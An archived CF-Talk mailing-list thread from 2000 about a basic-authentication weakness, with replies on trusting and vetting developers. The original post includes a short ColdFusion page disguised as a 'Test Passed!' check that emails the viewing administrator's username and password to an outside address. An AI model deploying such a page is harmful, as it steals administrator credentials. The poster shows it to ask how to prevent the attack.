Steve Bernard wrote:
>> We trust every faceless programmer who works on any software
If you are smart, you also run background checks, pull credit reports, check
references, call former employers, run a drug and tox screen, and check
transcripts. You perform regular audits by internal staff as well as by
outside auditors, you make sure a different division/department responsible
for physical and computer security, you rotate staff assignments, and you
make sure employees and contractors take regular vacations.
Only then can you trust your admins and developers.
The Russians have a saying, "Trust but verify!"
The Arabs says, "Trust in God but tie your camel."
My favorite is. "Trust everyone till you have a reason not to."
You should use all three.
- Steve
Steve Pierce, HDL
"Co-Location starting $99 per month, no setup fee"
(734) 482-9682 | mailto:[EMAIL PROTECTED] | http://HDL.com
-----Original Message-----
From: Steve Bernard [mailto:[EMAIL PROTECTED]]
Sent: Saturday, November 04, 2000 10:53 PM
To: CF-Talk
Subject: RE: Security hole in basic authorization... Solutions?
If you can't trust your developers then you need new people. We trust every
faceless programmer who works on any software that we load on our
workstations and servers. We trust consultants not to create backdoors when
brought in, and, in developer shoes, we trust the Admins not to misuse their
power. So, in short, you have to maintain a certain amount of trust, that's
how the world works.
Steve
----- Original Message -----
From: "Jamie Jackson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, November 03, 2000 11:21 AM
Subject: Security hole in basic authorization... Solutions?
Say I'm a developer, but not a not a SysAdmin.
It is too easy for me to get an administrator's username/password like
this, using Win2k basic authorization:
Hey, administrator, I'm troubleshooting a template, would you see if
the test passes?:
<html><body>
Test Passed! Thanks, for checking, administrator!
<cfmail to="[EMAIL PROTECTED]" from="[EMAIL PROTECTED]" subject="Got Root!">
#cgi.auth_user#
#cgi.auth_password#
</cfmail>
</body></html>
How do I prevent this from working?
Thanks,
Jamie
----------------------------------------------------------------------------
--------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=sts or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
----------------------------------------------------------------------------
--------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
----------------------------------------------------------------------------
--------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
------------------------------------------------------------------------------------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message
with 'unsubscribe' in the body to [EMAIL PROTECTED]
